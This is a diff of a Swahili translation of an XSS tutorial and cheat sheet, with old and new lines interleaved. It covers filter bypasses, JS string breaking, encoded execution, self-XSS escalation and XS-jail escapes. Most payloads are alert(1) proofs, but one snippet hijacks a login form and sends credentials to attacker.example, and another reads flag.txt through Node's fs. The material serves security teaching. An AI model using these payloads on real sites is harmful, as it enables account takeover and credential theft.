Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` (angalau) ili kutaja **HTML tags to execute JS**:
```javascript
//Encoded: <svg onload=alert(1)>
// This WORKS
@ -385,17 +383,16 @@ Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` (
```javascript
<a target="_blank" rel="opener"
```
Ikiwa unaweza kuingiza URL yoyote katika tagi yoyote ya **`<a href=`** ambayo ina sifa **`target="_blank" and rel="opener"`**, angalia **ukurasa ufuatao ili exploit tabia hii**:
Ikiwa unaweza kuingiza URL yoyote katika tag yoyote ya **`<a href=`** ambayo ina sifa **`target="_blank" and rel="opener"`**, angalia **ukurasa ufuatao ili kufaida tabia hii**:
{{#ref}}
../reverse-tab-nabbing.md
{{#endref}}
### on Event Handlers Bypass
### Bypass ya 'on' Event Handlers
Kwanza kabisa angalia ukurasa huu ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) kwa **"on" event handlers** muhimu.\
Ikiwa kuna blacklist inayokuzuia kuunda event handlers hizi unaweza kujaribu bypass zifuatazo:
Kwanza angalia ukurasa huu ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) kwa **"on" event handlers** muhimu.\
Ikiwa kuna blacklist inayokuzuia kuunda hizi even handlers unaweza kujaribu bypasses zifuatazo:
```javascript
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
@ -431,37 +428,37 @@ onbeforetoggle="alert(2)" />
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
```
Kutoka [**hapa**](https://portswigger.net/research/xss-in-hidden-input-fields): Unaweza kutekeleza **XSS payload ndani ya attribute iliyofichwa**, mradi unaweza **kumshawishi** **mtu aliyeathirika** kubonyeza **mchanganyiko wa funguo**. Kwenye Firefox kwenye Windows/Linux mchanganyiko wa funguo ni **ALT+SHIFT+X** na kwenye OS X ni **CTRL+ALT+X**. Unaweza kubainisha mchanganyiko tofauti wa funguo kwa kutumia funguo tofauti katika access key attribute. Hapa kuna vektori:
Kutoka [**here**](https://portswigger.net/research/xss-in-hidden-input-fields): Unaweza kutekeleza **XSS payload inside a hidden attribute**, mradi ukaweza **kumshawishi** **mwanaathiriwa** kubonyeza **mchanganyiko wa vitufe**. Kwenye Firefox kwenye Windows/Linux mchanganyiko wa vitufe ni **ALT+SHIFT+X** na kwenye OS X ni **CTRL+ALT+X**. Unaweza kubainisha mchanganyiko tofauti wa vitufe kwa kutumia kitufe tofauti katika access key attribute. Hapa ni vector:
```html
<input type="hidden" accesskey="X" onclick="alert(1)">
```
**XSS payload itakuwa kitu kama hiki: `" accesskey="x" onclick="alert(1)" x="`**
**Payload ya XSS itakuwa kama hii: `" accesskey="x" onclick="alert(1)" x="`**
### Blacklist Bypasses
Mbinu kadhaa za kutumia encoding tofauti tayari zilielezwa ndani ya sehemu hii. Rudi **kujifunza wapi unaweza kutumia:**
Mbinu kadhaa za kutumia encoding tofauti zimetajwa tayari ndani ya sehemu hii. Rudi ili kujifunza wapi unaweza kutumia:
- **HTML encoding (HTML tags)**
- **Unicode encoding (can be valid JS code):** `\u0061lert(1)`
- **Unicode encoding (inaweza kuwa valid JS code):** `\u0061lert(1)`
- **URL encoding**
- **Hex and Octal encoding**
- **data encoding**
**Bypasses for HTML tags and attributes**
Soma the[ Blacklist Bypasses of the previous section](#blacklist-bypasses).
Soma [ Blacklist Bypasses of the previous section](#blacklist-bypasses).
**Bypasses for JavaScript code**
Soma J[avaScript bypass blacklist of the following section](#javascript-bypass-blacklists-techniques).
Soma the [JavaScript bypass blacklist of the following section](#javascript-bypass-blacklists-techniques).
### CSS-Gadgets
Ikiwa umegundua **XSS katika sehemu ndogo sana** ya tovuti ambayo inahitaji aina fulani ya mwingiliano (labda link ndogo kwenye footer yenye onmouseover element), unaweza kujaribu **kubadilisha nafasi ambayo kipengele hicho kinachukua** ili kuongeza uwezekano wa link itakapoendeshwa.
Ikiwa umepata **XSS katika sehemu ndogo sana** ya tovuti inayohitaji aina fulani ya mwingiliano (labda link ndogo kwenye footer yenye onmouseover element), unaweza kujaribu **kubadilisha nafasi ambayo kipengele hicho kinachukua** ili kuongeza uwezekano wa link kutekelezwa.
Kwa mfano, unaweza kuongeza styling katika element kama: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
Kwa mfano, unaweza kuongeza styling katika kipengele kama: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
Lakini, ikiwa WAF inachuja style attribute, unaweza kutumia CSS Styling Gadgets, kwa hivyo ikiwa upata, kwa mfano
Lakini, ikiwa WAF inachuja style attribute, unaweza kutumia CSS Styling Gadgets, kwa hivyo ikiwa unapopata, kwa mfano
> .test {display:block; color: blue; width: 100%\}
@ -469,27 +466,27 @@ na
> \#someid {top: 0; font-family: Tahoma;}
Sasa unaweza kubadilisha link yetu na kuileta kwa umbo
Sasa unaweza kubadilisha link yetu na kuibadilisha kuwa fomu
> \<a href="" id=someid class=test onclick=alert() a="">
Njia hii ilichukuliwa kutoka [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)
Njia hii ilichukuliwa kutoka kwa [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)
## Injecting inside JavaScript code
Katika kesi hizi, **input** yako itarejea ndani ya JS code ya `.js` file au kati ya `<script>...</script>` tags au kati ya HTML events ambazo zinaweza kutekeleza JS code au kati ya attributes zinazokubali `javascript:` protocol.
Katika kesi hizi **input** yako itaonyeshwa ndani ya JS code ya faili `.js` au kati ya `<script>...</script>` tags au kati ya HTML events zinazoweza kutekeleza JS code au kati ya attributes zinazokubali protocol ya `javascript:`.
### Escaping \<script> tag
### Kuondoka kutoka kwenye tag ya \<script>
Ikiwa code yako imeingizwa ndani ya `<script> [...] var input = 'reflected data' [...] </script>` unaweza kwa urahisi **kuepuka kufunga tag ya `<script>`**:
```javascript
</script><img src=1 onerror=alert(document.domain)>
```
Kumbuka kwamba katika mfano huu **hatujafunga hata alama ya nukuu moja**. Hii ni kwa sababu **HTML parsing is performed first by the browser**, ambayo inahusisha kutambua vipengele vya ukurasa, ikiwemo blocks za script. Uchambuzi wa JavaScript ili kuelewa na kutekeleza scripts zilizoungwa ndani unafanywa tu baadaye.
Kumbuka kwamba katika mfano huu **hatujafunga hata nukuu moja**. Hii ni kwa sababu **HTML parsing is performed first by the browser**, ambayo inahusisha kutambua vipengele vya ukurasa, ikiwa ni pamoja na blocks za script. Uchambuzi wa JavaScript ili kuelewa na kutekeleza scripts zilizopachikwa hufanywa tu baadaye.
### Ndani ya JS code
### Ndani ya msimbo wa JS
If `<>` are being sanitised you can still **escape the string** where your input is being **located** and **execute arbitrary JS**. Ni muhimu **fix JS syntax**, kwa sababu ikiwa kuna makosa, JS code haitatekelezwa:
Ikiwa `<>` zinasafishwa bado unaweza **escape the string** mahali ambapo ingizo lako limewekwa (**located**) na **execute arbitrary JS**. Ni muhimu **fix JS syntax**, kwa sababu ikiwa kuna makosa, msimbo wa JS hautatekelezwa:
```
'-alert(document.domain)-'
';alert(document.domain)//
@ -497,23 +494,23 @@ If `<>` are being sanitised you can still **escape the string** where your input
```
#### JS-in-JS string break → inject → repair pattern
Wakati user input inapoweka ndani ya quoted JavaScript string (kwa mfano, server-side echo into an inline script), unaweza terminate the string, inject code, na repair the syntax ili parsing iendelee kuwa valid. Generic skeleton:
Wakati ingizo la mtumiaji linapoingia ndani ya quoted JavaScript string (kwa mfano, server-side echo katika inline script), unaweza kumaliza string, inject code, na kurekebisha syntax ili parsing ibaki halali. Generic skeleton:
```
" // end original string
; // safely terminate the statement
<INJECTION> // attacker-controlled JS
; a = " // repair and resume expected string/statement
```
Mfano wa muundo wa URL wakati parameter hatarishi unarejeshwa ndani ya JS string:
Mfano wa muundo wa URL wakati parameter dhaifu imerejeshwa ndani ya JS string:
```
?param=test";<INJECTION>;a="
```
Hii inatekeleza attacker JS bila ya kuhitaji kugusa muktadha wa HTML (pure JS-in-JS). Changanya na blacklist bypasses hapa chini wakati filters zinapozuia maneno muhimu.
Hii inatekeleza attacker JS bila kuhitaji kugusa HTML context (pure JS-in-JS). Changanya na blacklist bypasses hapa chini wakati filters zinapozuia maneno muhimu.
### Template literals ``
### Template literals \`\`
Ili kujenga **strings** mbali na single na double quotes, JS pia inakubali **backticks** **` `` `**. Hii inajulikana kama template literals kwani zinaruhusu **embedded JS expressions** kwa kutumia sintaksia `${ ... }`.\
Kwa hivyo, ikiwa ugundua kwamba input yako inarudishwa ndani ya JS string inayotumia backticks, unaweza kuiba sintaksia `${ ... }` kutekeleza **arbitrary JS code**:
Ili kuunda **strings**, mbali na single na double quotes, JS pia inakubali **backticks** **` `` `** . Hii inajulikana kama template literals kwani zinaruhusu **embedded JS expressions** kwa kutumia sintaksia `${ ... }`.\
Kwa hivyo, ukigundua kuwa input yako ina **reflected** ndani ya JS string inayotumia backticks, unaweza kutumia sintaksia `${ ... }` kutekeleza **arbitrary JS code**:
Hii inaweza **kutumiwa vibaya** kwa kutumia:
```javascript
@ -527,35 +524,35 @@ return loop
}
loop``
```
### Utekelezaji wa msimbo uliokodishwa
### Utekelezaji wa code uliosimbwa
```html
<script>\u0061lert(1)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>alert(1)</script></svg> <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
```
#### Deliverable payloads na eval(atob()) na nuances za scope
#### Payloads zinazotolewa na eval(atob()) na tofauti za scope
Ili kufanya URLs ziwe fupi na kuzuia vichujio vya maneno rahisi, unaweza base64-encode mantiki yako halisi na kuievaluate kwa kutumia `eval(atob('...'))`. Ikiwa uchujaji rahisi wa maneno utaizuia vitambulisho kama `alert`, `eval`, au `atob`, tumia vitambulisho vilivyofichwa kwa Unicode (Unicode-escaped) ambavyo vinakompaili sawa kwenye browser lakini vinaepuka vichujio vinavyoendana na mnyororo wa herufi:
Ili kuweka URLs fupi na kupita vichujio rahisi vya maneno muhimu, unaweza ku-encode logic yako halisi kwa base64 na kui-evaluate kwa `eval(atob('...'))`. Ikiwa vichujio rahisi vya maneno muhimu vinazuia identifiers kama `alert`, `eval`, au `atob`, tumia Unicode-escaped identifiers ambazo zina-compile kwa njia ile ile kwenye browser lakini zinaepuka vichujio vinavyolingana na string:
```
\u0061\u006C\u0065\u0072\u0074(1) // alert(1)
\u0065\u0076\u0061\u006C(\u0061\u0074\u006F\u0062('BASE64')) // eval(atob('...'))
```
Tofauti muhimu ya wigo: `const`/`let` zinazotangazwa ndani ya `eval()` zina wigo la block na HAZI za kuunda variables globali; hazitapatikana kwa scripts zinazofuata. Tumia elementi ya `<script>` iliyotiwa kwa dynamic ili kufafanua hooks globali, zisizoweza kubadilishwa pale zinapohitajika (kwa mfano, to hijack a form handler):
Tofauti muhimu kuhusu scoping: `const`/`let` zinazotangazwa ndani ya `eval()` ni block-scoped na HAZIUNZI globals; hazitapatikana kwa scripts zinazofuatia. Tumia `<script>` element iliyochomwa dinamiki ili kufafanua global, non-rebindable hooks inapohitajika (kwa mfano, ku-hijack form handler):
```javascript
var s = document.createElement('script');
s.textContent = "const DoLogin = () => {const pwd = Trim(FormInput.InputPassword.value); const user = Trim(FormInput.InputUtente.value); fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));}";
document.head.appendChild(s);
```
Marejeleo: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval
Marejeo: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval
### Kodisha Unicode (utekelezaji wa JS)
### Utekelezaji wa JS kupitia kodishaji la Unicode
```javascript
alert(1)
alert(1)
alert(1)
```
### Mbinu za kuepuka blacklist za JavaScript
### Mbinu za JavaScript bypass blacklists
**Strings**
```javascript
@ -574,7 +571,7 @@ String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))
```
**Mfuatano maalum wa kutoroka**
**Escapes maalum**
```javascript
"\b" //backspace
"\f" //form feed
@ -588,12 +585,12 @@ eval(8680439..toString(30))(983801..toString(36))
"\t" //tab
// Any other char escaped is just itself
```
**Ubadilishaji wa nafasi ndani ya JS code**
**Mbadala za nafasi ndani ya msimbo wa JS**
```javascript
<TAB>
/**/
```
**JavaScript comments (kutoka** [**JavaScript Comments**](#javascript-comments) **njia)**
**JavaScript comments (kutoka** [**JavaScript Comments**](#javascript-comments) **triki)**
```javascript
//This is a 1 line comment
/* This is a multiline comment*/
@ -601,7 +598,7 @@ eval(8680439..toString(30))(983801..toString(36))
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
```
**Mistari mipya ya JavaScript (kutoka** [**JavaScript new line**](#javascript-new-lines) **njia)**
**JavaScript new lines (kutoka** [**JavaScript new line**](#javascript-new-lines) **triki)**
```javascript
//Javascript interpret as new line these chars:
String.fromCharCode(10)
@ -613,7 +610,7 @@ alert("//\u2028alert(1)") //0xe2 0x80 0xa8
String.fromCharCode(8233)
alert("//\u2029alert(1)") //0xe2 0x80 0xa9
```
**Nafasi tupu za JavaScript**
**JavaScript nafasi nyeupe**
```javascript
log=[];
function funct(){}
@ -630,7 +627,7 @@ console.log(log)
//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert&#65279;(1)>
```
**Javascript ndani ya maoni**
**Javascript ndani ya comment**
```javascript
//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send
@ -716,7 +713,7 @@ try{throw onerror=alert}catch{throw 1}
- [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
- [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
**Mwito wa kazi yoyote (alert)**
**Kuita function yoyote (alert)**
```javascript
//Eval like functions
eval('ale'+'rt(1)')
@ -776,47 +773,58 @@ top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>
```
## **DOM vulnerabilities**
## **Udhaifu za DOM**
Kuna **JS code** inayotumia **data isiyokuwa salama inayoendeshwa na mshambuliaji** kama `location.href`. Mshambuliaji anaweza kutumia hili kutekeleza msimbo wowote wa JS.\
**Kwa sababu ya urefu wa maelezo ya** [**DOM vulnerabilities ilihamishiwa kwenye ukurasa huu**](dom-xss.md)**:**
Kuna **JS code** inayotumia **data isiyo salama inayodhibitiwa na mhamasishaji** kama `location.href`. Mhamasishaji anaweza kutumia hili kutekeleza JS arbitrary.\
**Kutokana na upanuzi wa maelezo ya** [**Udhaifu za DOM - imehamishwa kwenye ukurasa huu**](dom-xss.md)**:**
{{#ref}}
dom-xss.md
{{#endref}}
Utanakutana huko na **maelezo ya kina kuhusu DOM vulnerabilities, jinsi zinavyosababishwa, na jinsi za kuzitumia**.\
Pia, usisahau kwamba **mwishoni mwa chapisho kilicho takiwa** unaweza kupata maelezo kuhusu [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
Hapo utapata **maelezo ya kina kuhusu ni udhaifu gani za DOM, zinawezaje kusababishwa, na jinsi ya kuzitumia**.\
Pia, usisahau kwamba **mwishoni mwa chapisho kilichotajwa** utaona maelezo kuhusu [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
### Upgrading Self-XSS
### Kuimarisha Self-XSS
### Cookie XSS
Ikiwa unaweza kuchochea XSS kwa kutuma payload ndani ya cookie, kawaida hii ni self-XSS. Hata hivyo, ukipata **vulnerable subdomain to XSS**, unaweza kutumia XSS hii kuingiza cookie kwa kikoa chote na hivyo kuchochea cookie XSS kwenye kikoa kikuu au subdomains nyingine (mmoja walio vulnerable kwa cookie XSS). Kwa hili unaweza kutumia cookie tossing attack:
Ikiwa unaweza kusababisha XSS kwa kutuma payload ndani ya cookie, kawaida hii ni self-XSS. Hata hivyo, ukigundua **subdomain iliyo dhaifu kwa XSS**, unaweza kutumia XSS hiyo kuingiza cookie katika domain nzima na kusababisha cookie XSS kwenye domain kuu au subdomain nyingine (zile zilizo dhaifu kwa cookie XSS). Kwa hili unaweza kutumia cookie tossing attack:
{{#ref}}
../hacking-with-cookies/cookie-tossing.md
{{#endref}}
You can find a great abuse of this technique in [**this blog post**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html).
Unaweza kupata matumizi makubwa ya mbinu hii katika [**chapisho hili la blogu**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html).
### Sending your session to the admin
### Kutuma session yako kwa admin
Labda mtumiaji anaweza kushiriki wasifu wake na admin, na ikiwa self XSS iko ndani ya wasifu wa mtumiaji na admin anaiangalia, ataichochea udhaifu huo.
Huenda mtumiaji anaweza kushiriki profile yake na admin, na ikiwa self XSS iko ndani ya profile ya mtumiaji na admin ataifikia, atasababisha udhaifu huo.
### Session Mirroring
### Kuakisi kikao
Ikiwa unapata self XSS na ukurasa wa wavuti una **session mirroring for administrators**, kwa mfano kuruhusu wateja kuomba msaada ili admin akupe msaada atakuwa anaona kile unachoona katika session yako lakini kutoka session yake.
Ikiwa unatambua self XSS na ukurasa wa wavuti una **session mirroring kwa administrators**, kwa mfano kuruhusu wateja kuomba msaada na ili admin akupe msaada atakuwa akiangalia kile unachoona katika session yako lakini kwa session yake.
Unaweza kumfanya **administrator trigger your self XSS** na kumpora cookies/session yake.
Unaweza kufanya **msimamizi asababisha self XSS yako** na kuiba cookies/session zake.
## Njia nyingine za kupita
### Kupita sanitization kupitia WASM linear-memory template overwrite
Wakati web app inapotumia Emscripten/WASM, constant strings (kama HTML format stubs) zinaishi kwenye writable linear memory. Overflow moja ndani ya WASM (mfano, memcpy isiyochunguzwa kwenye njia ya uhariri) inaweza kuharibu miundo jirani na kuelekeza maandishi kwenye constant hizo. Kuandika upya template kama "<article><p>%.*s</p></article>" hadi "<img src=1 onerror=%.*s>" kunageuza input iliyosanitiwa kuwa thamani ya handler ya JavaScript na kusababisha DOM XSS mara moja wakati wa render.
Angalia ukurasa maalum wenye mtiririko wa exploitation, DevTools memory helpers, na mbinu za ulinzi:
{{#ref}}
wasm-linear-memory-template-overwrite-xss.md
{{#endref}}
## Other Bypasses
### Normalised Unicode
Unaweza kuangalia kama **reflected values** zinafanyiwa **unicode normalized** kwenye server (au upande wa client) na kutumia kazi hii kuingia kando ya ulinzi. [**Find an example here**](../unicode-injection/index.html#xss-cross-site-scripting).
Unaweza kuangalia kama **reflected values** zinafanyiwa **unicode normalized** upande wa server (au upande wa client) na kutumia vibaya utendakazi huu kupita ulinzi. [**Pata mfano hapa**](../unicode-injection/index.html#xss-cross-site-scripting).
### PHP FILTER_VALIDATE_EMAIL flag Bypass
```javascript
@ -824,16 +832,16 @@ Unaweza kuangalia kama **reflected values** zinafanyiwa **unicode normalized** k
```
### Ruby-On-Rails bypass
Kutokana na **RoR mass assignment** nukuu zinaingizwa ndani ya HTML na kisha kikomo cha nukuu kinavunjwa na mashamba ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.\
Kutokana na **RoR mass assignment** alama za nukuu zinaingizwa kwenye HTML, na hivyo kikomo cha nukuu kinaweza kupitishwa na mashamba ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.\
Mfano wa fomu ([from this report](https://hackerone.com/reports/709336)), ikiwa utatuma payload:
```
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
```
Jozi "Key","Value" itarudishwa kama hii:
Jozi "Key","Value" itarudishwa kama ifuatavyo:
```
{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}
```
Kisha, onfocus attribute itaingizwa na XSS itatokea.
Kisha, attribute onfocus itaingizwa na XSS itatokee.
### Mchanganyiko maalum
```html
@ -865,24 +873,24 @@ Kisha, onfocus attribute itaingizwa na XSS itatokea.
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
```
### XSS na injection ya header katika response ya 302
### XSS with header injection in a 302 response
Ukipata kuwa unaweza **kuingiza headers katika 302 Redirect response** unaweza kujaribu **kumfanya browser itekeleze arbitrary JavaScript**. Hii si rahisi kwani browsers za kisasa hazitafsiri HTTP response body ikiwa HTTP response status code ni 302, hivyo payload ya cross-site scripting pekee haitakuwa na faida.
Ikiwa ugundua kuwa unaweza **inject headers in a 302 Redirect response** unaweza kujaribu **make the browser execute arbitrary JavaScript**. Hii si rahisi kama ilivyo kawaida kwa sababu modern browsers hazitafsiri HTTP response body ikiwa HTTP response status code ni 302, hivyo just a cross-site scripting payload haifai.
Katika [**this report**](https://www.gremwell.com/firefox-xss-302) na [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) unaweza kusoma jinsi unavyoweza kujaribu protocols kadhaa ndani ya Location header na kuona ikiwa yoyote yao inaruhusu browser kukagua na kutekeleza payload ya XSS ndani ya body.\
In [**this report**](https://www.gremwell.com/firefox-xss-302) and [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) unaweza kusoma jinsi ya kujaribu protokoli kadhaa ndani ya Location header na kuona kama yoyote yao inaruhusu browser kuchunguza na execute XSS payload ndani ya body.\
Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location header_, `resource://`.
### Herufi, Nambari na Nukta Pekee
### Herufi Pekee, Nambari na Nukta
Ikiwa unaweza kubainisha **callback** ambayo javascript itakayokuwa **itekelezwe** ikiwa imepunguzwa kwa herufi, nambari na nukta tu. [**Read this section of this post**](#javascript-function) ili kujifunza jinsi ya kuudanganya tabia hii.
If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](#javascript-function) to find how to abuse this behaviour.
### Valid `<script>` Content-Types to XSS
### Content-Types Sahihi za `<script>` kwa XSS
(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Ikiwa unajaribu kupakia script yenye **content-type** kama `application/octet-stream`, Chrome itatoa kosa lifuatalo:
(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) If you try to load a script with a **content-type** such as `application/octet-stream`, Chrome will throw following error:
> Refused to execute script from [https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') because its MIME type (application/octet-stream) is not executable, and strict MIME type checking is enabled.
Ya pekee **Content-Type**s zitakazomsaidia Chrome kutekeleza **loaded script** ni zile zilizomo kwenye const **`kSupportedJavascriptTypes`** kutoka [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)
The only **Content-Type**s that will support Chrome to run a **loaded script** are the ones inside the const **`kSupportedJavascriptTypes`** from [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)
```c
const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
@ -906,14 +914,14 @@ const char* const kSupportedJavascriptTypes[] = {
```
### Aina za Script kwa XSS
(From [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Kwa hivyo, ni aina gani zinaweza kuainishwa ili kupakia script?
(Kutoka [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Basi, ni aina gani zinaweza kuonyeshwa ili kupakia script?
```html
<script type="???"></script>
```
Jibu ni:
- **module** (default, hakuna cha kuelezea)
- [**webbundle**](https://web.dev/web-bundles/): Web Bundles ni kipengele kinachokuwezesha kukusanya data nyingi (HTML, CSS, JS…) pamoja ndani ya faili la **`.wbn`**.
- **module** (chaguo-msingi, hakuna cha kufafanua)
- [**webbundle**](https://web.dev/web-bundles/): Web Bundles ni kipengele kinachokuruhusu kuweka pamoja data nyingi (HTML, CSS, JS…) katika faili ya **`.wbn`**.
```html
<script type="webbundle">
{
@ -923,7 +931,7 @@ Jibu ni:
</script>
The resources are loaded from the source .wbn, not accessed via HTTP
```
- [**importmap**](https://github.com/WICG/import-maps)**:** Inaruhusu kuboresha sintaksi ya import
- [**importmap**](https://github.com/WICG/import-maps)**:** Inaruhusu kuboresha import syntax
```html
<script type="importmap">
{
@ -940,9 +948,9 @@ import moment from "moment"
import { partition } from "lodash"
</script>
```
Tabia hii ilitumiwa katika [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) kurekebisha maktaba ili kutumia eval; kuitumia vibaya kunaweza kusababisha XSS.
Tabia hii ilitumika katika [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) kuremapa laibrari kwa eval ili kuitumia vibaya — inaweza kusababisha XSS.
- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Kipengele hiki hasa kimekusudiwa kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kinafanya kazi kama ifuatavyo:
- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Kipengele hiki hasa kilikusudiwa kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kinafanya kazi hivi:
```html
<script type="speculationrules">
{
@ -958,7 +966,7 @@ Tabia hii ilitumiwa katika [**this writeup**](https://github.com/zwade/yaca/tree
}
</script>
```
### Web Content-Types kwa XSS
### Content-Types za Web kwa XSS
(Kutoka [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Aina zifuatazo za Content-Types zinaweza kutekeleza XSS katika browsers zote:
@ -967,15 +975,15 @@ Tabia hii ilitumiwa katika [**this writeup**](https://github.com/zwade/yaca/tree
- application/xml
- text/xml
- image/svg+xml
- text/plain (?? not in the list but I think I saw this in a CTF)
- text/plain (?? haipo kwenye orodha lakini nadhani niliona hii kwenye CTF)
- application/rss+xml (off)
- application/atom+xml (off)
Katika browsers nyingine, **`Content-Types`** nyingine zinaweza kutumika kutekeleza arbitrary JS, angalia: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md)
Katika browsers nyingine, aina nyingine za **`Content-Types`** zinaweza kutumika kuendesha JS yoyote, angalia: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md)
### xml Content Type
Ikiwa ukurasa unarudisha content-type text/xml, inawezekana kuonyesha namespace na kutekeleza arbitrary JS:
Kama ukurasa unarudisha text/xml content-type, inawezekana kuonyesha namespace na kuendesha JS yoyote:
```xml
<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
@ -987,9 +995,9 @@ Ikiwa ukurasa unarudisha content-type text/xml, inawezekana kuonyesha namespace
Wakati kitu kama **`"some {{template}} data".replace("{{template}}", <user_input>)`** kinapotumika. Mshambuliaji anaweza kutumia [**special string replacements**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#specifying_a_string_as_the_replacement) kujaribu kuvuka baadhi ya kinga: `` "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"})) ``
Kwa mfano katika [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), hili lilitumika ku-escape string ya JSON ndani ya script na kutekeleza code yoyote.
Kwa mfano katika [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), hili lilitumika kwa **ku-escape JSON string** ndani ya script na kutekeleza arbitrary code.
### Cache ya Chrome kwa XSS
### Chrome Cache to XSS
{{#ref}}
@ -998,7 +1006,7 @@ chrome-cache-to-xss.md
### XS Jails Escape
Ikiwa una idadi ndogo tu ya characters za kutumia, angalia suluhisho hizi nyingine zinazofaa kwa matatizo ya XSJail:
Ikiwa una seti ndogo tu ya chars za kutumia, angalia suluhisho hizi nyingine sahihi kwa matatizo ya XSJail:
```javascript
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
@ -1029,22 +1037,22 @@ constructor(source)()
// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```
Ikiwa **everything is undefined** kabla ya kutekeleza untrusted code (kama katika [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)) inawezekana kuunda vitu vinavyofaa "out of nothing" ili kutumia vibaya utekelezaji wa arbitrary untrusted code:
Iwapo **everything is undefined** kabla ya kuendesha untrusted code (kama katika [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)), inawezekana kuunda vitu muhimu "out of nothing" ili kuabusu execution ya arbitrary untrusted code:
- Using import()
```javascript
// although import "fs" doesnt work, import('fs') does.
